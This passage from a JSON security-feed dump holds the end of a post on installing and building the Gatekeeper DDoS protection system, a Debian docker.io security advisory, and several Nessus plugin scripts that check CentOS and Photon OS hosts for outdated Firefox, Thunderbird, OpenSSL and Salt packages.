For example: \n \n \n $ sudo dependencies/dpdk/usertools/dpdk-devbind.py --bind=uio_pci_generic enp131s0f0 \n \n\nThis command binds the interface ` enp131s0f0 ` to the ` uio_pci_generic ` driver so that frames can be passed directly to DPDK instead of the kernel. Note that this binding must take place after Gatekeeper is setup in the steps above so that the bound interface appears in the list of interfaces in ` lua/if_map.lua ` . \n\n \n** How to Run ** \n\n\nOnce ` gatekeeper ` is compiled and the environment is configured correctly, run: \n \n \n $ sudo build/gatekeeper [EAL OPTIONS] -- [GATEKEEPER OPTIONS] \n \n\nWhere ` [EAL OPTIONS] ` are specified before a double dash and represent the parameters for DPDK's [ Environmental Abstraction Layer ](<https://doc.dpdk.org/guides/linux_gsg/linux_eal_parameters.html> \"Environmental Abstraction Layer\" ) and ` [GATEKEEPER OPTIONS] ` are specified after the double dash and represent [ Gatekeeper-specific options ](<https://github.com/AltraMayor/gatekeeper/wiki/Configuration#application-configuration> \"Gatekeeper-specific options\" ) . \n\nThe early configuration of the system, including device and memory configuration in DPDK, will be logged to stdout. Once Gatekeeper is booted, all information is output to the Gatekeeper log. \n\n \n** How to build packages ** \n\n\nGatekeeper Debian packages can be built with the commands below. They are meant to be run from the repository root and assume the git submodules have been pulled, and that the build dependencies have been installed, as instructed above. Gatekeeper and the submodules will be automatically compiled during the package build process. \n \n \n $ tar --exclude-vcs -Jcvf ../gatekeeper_1.0.0.orig.tar.xz -C .. gatekeeper \n $ debuild -uc -us \n \n\nThe Gatekeeper package will be available in the parent directory. 
\n\n \n \n\n\n** [ Download Gatekeeper ](<https://github.com/AltraMayor/gatekeeper> \"Download Gatekeeper\" ) **\n", "edition": 1, "modified": "2021-02-27T11:30:04", "published": "2021-02-27T11:30:04", "id": "KITPLOIT:6668773637474143833", "href": "http://www.kitploit.com/2021/02/gatekeeper-first-open-source-ddos.html", "title": "Gatekeeper - First Open-Source DDoS Protection System", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2021-02-28T01:29:34", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21285", "CVE-2020-15257", "CVE-2021-21284", "CVE-2020-15157"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4865-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nFebruary 27, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : docker.io\nCVE ID : CVE-2020-15157 CVE-2020-15257 CVE-2021-21284 CVE-2021-21285\n\nMultiple security issues were discovered in Docker, a Linux container\nruntime, which could result in denial of service, an information leak\nor privilege escalation.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 18.09.1+dfsg1-7.1+deb10u3.\n\nWe recommend that you upgrade your docker.io packages.\n\nFor the detailed security status of docker.io please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/docker.io\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "modified": "2021-02-27T18:36:59", "published": "2021-02-27T18:36:59", "id": "DEBIAN:DSA-4865-1:E637E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00046.html", 
"title": "[SECURITY] [DSA 4865-1] docker.io security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-02-28T01:28:40", "description": "The remote CentOS Linux 8 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nCESA-2021:0655 advisory.\n\n - Mozilla: Content Security Policy violation report could have contained the destination of a redirect\n (CVE-2021-23968, CVE-2021-23969)\n\n - Mozilla: MediaError message property could have leaked information about cross-origin resources\n (CVE-2021-23973)\n\n - Mozilla: Memory safety bugs fixed in Firefox 86 and Firefox ESR 78.8 (CVE-2021-23978)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 1, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-27T00:00:00", "title": "CentOS 8 : firefox (CESA-2021:0655)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-23969", "CVE-2021-23978", "CVE-2021-23973", "CVE-2021-23968"], "modified": "2021-02-27T00:00:00", "cpe": ["cpe:/a:centos:centos:8::highavailability", "cpe:/o:centos:centos:8::baseos", "cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:firefox", "cpe:/a:centos:centos:8::nfv", "cpe:/a:centos:centos:8::powertools", "cpe:/a:centos:centos:8::appstream"], "id": "CENTOS8_RHSA-2021-0655.NASL", "href": "https://www.tenable.com/plugins/nessus/146870", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2021:0655. 
The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146870);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\n \"CVE-2021-23968\",\n \"CVE-2021-23969\",\n \"CVE-2021-23973\",\n \"CVE-2021-23978\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0655\");\n\n script_name(english:\"CentOS 8 : firefox (CESA-2021:0655)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nCESA-2021:0655 advisory.\n\n - Mozilla: Content Security Policy violation report could have contained the destination of a redirect\n (CVE-2021-23968, CVE-2021-23969)\n\n - Mozilla: MediaError message property could have leaked information about cross-origin resources\n (CVE-2021-23973)\n\n - Mozilla: Memory safety bugs fixed in Firefox 86 and Firefox ESR 78.8 (CVE-2021-23978)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0655\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected firefox package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-23978\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2021/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::highavailability\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::nfv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::powertools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:firefox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? 
release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'firefox-78.8.0-1.el8_3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE},\n {'reference':'firefox-78.8.0-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n 
}\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'firefox');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-28T01:28:41", "description": "The remote CentOS Linux 8 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nCESA-2021:0657 advisory.\n\n - Mozilla: Content Security Policy violation report could have contained the destination of a redirect\n (CVE-2021-23968, CVE-2021-23969)\n\n - Mozilla: MediaError message property could have leaked information about cross-origin resources\n (CVE-2021-23973)\n\n - Mozilla: Memory safety bugs fixed in Firefox 86 and Firefox ESR 78.8 (CVE-2021-23978)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 1, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-27T00:00:00", "title": "CentOS 8 : thunderbird (CESA-2021:0657)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-23969", "CVE-2021-23978", "CVE-2021-23973", "CVE-2021-23968"], "modified": "2021-02-27T00:00:00", "cpe": ["cpe:/a:centos:centos:8::highavailability", "p-cpe:/a:centos:centos:thunderbird", "cpe:/o:centos:centos:8::baseos", "cpe:/o:centos:centos:8", "cpe:/a:centos:centos:8::nfv", "cpe:/a:centos:centos:8::powertools", "cpe:/a:centos:centos:8::appstream"], "id": "CENTOS8_RHSA-2021-0657.NASL", "href": "https://www.tenable.com/plugins/nessus/146872", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2021:0657. 
The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146872);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\n \"CVE-2021-23968\",\n \"CVE-2021-23969\",\n \"CVE-2021-23973\",\n \"CVE-2021-23978\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0657\");\n\n script_name(english:\"CentOS 8 : thunderbird (CESA-2021:0657)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nCESA-2021:0657 advisory.\n\n - Mozilla: Content Security Policy violation report could have contained the destination of a redirect\n (CVE-2021-23968, CVE-2021-23969)\n\n - Mozilla: MediaError message property could have leaked information about cross-origin resources\n (CVE-2021-23973)\n\n - Mozilla: Memory safety bugs fixed in Firefox 86 and Firefox ESR 78.8 (CVE-2021-23978)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0657\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected thunderbird package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-23978\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/23\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::highavailability\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::nfv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::powertools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? 
release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'thunderbird-78.8.0-1.el8_3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE},\n {'reference':'thunderbird-78.8.0-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) 
flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'thunderbird');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-28T01:12:48", "description": "An update of the openssl package has been released.", "edition": 1, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2021-02-27T00:00:00", "title": "Photon OS 3.0: Openssl PHSA-2021-3.0-0200", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-23839"], "modified": "2021-02-27T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:openssl", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2021-3_0-0200_OPENSSL.NASL", "href": "https://www.tenable.com/plugins/nessus/146873", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-3.0-0200. 
The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146873);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\"CVE-2021-23839\");\n\n script_name(english:\"Photon OS 3.0: Openssl PHSA-2021-3.0-0200\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the openssl package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-200.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-23839\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'openssl-1.0.2y-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'openssl-c_rehash-1.0.2y-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'openssl-devel-1.0.2y-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'openssl-perl-1.0.2y-1.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'openssl');\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-28T01:12:47", "description": "An update of the salt package has been released.", "edition": 1, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2021-02-27T00:00:00", "title": "Photon OS 1.0: Salt PHSA-2021-1.0-0364", "type": "nessus", "bulletinFamily": "scanner", "cvelist": 
["CVE-2020-35662", "CVE-2021-25283", "CVE-2021-25284", "CVE-2021-3197", "CVE-2020-28972", "CVE-2021-3148", "CVE-2021-25281", "CVE-2021-25282", "CVE-2020-28243", "CVE-2021-3144"], "modified": "2021-02-27T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:salt", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2021-1_0-0364_SALT.NASL", "href": "https://www.tenable.com/plugins/nessus/146878", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-1.0-0364. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146878);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\n \"CVE-2020-28243\",\n \"CVE-2020-28972\",\n \"CVE-2020-35662\",\n \"CVE-2021-25281\",\n \"CVE-2021-25282\",\n \"CVE-2021-25283\",\n \"CVE-2021-25284\",\n \"CVE-2021-3144\",\n \"CVE-2021-3148\",\n \"CVE-2021-3197\"\n );\n\n script_name(english:\"Photon OS 1.0: Salt PHSA-2021-1.0-0364\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-364.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3197\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 1.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-api-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-cloud-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-master-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', 
reference:'salt-minion-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-proxy-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-spm-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-ssh-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-syndic-2019.2.4-2.ph1')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'salt');\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-02-28T01:12:48", "description": "An update of the binutils package has been released.", "edition": 1, "cvss3": {"score": 6.1, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"}, "published": "2021-02-27T00:00:00", "title": "Photon OS 2.0: Binutils PHSA-2021-2.0-0321", "type": 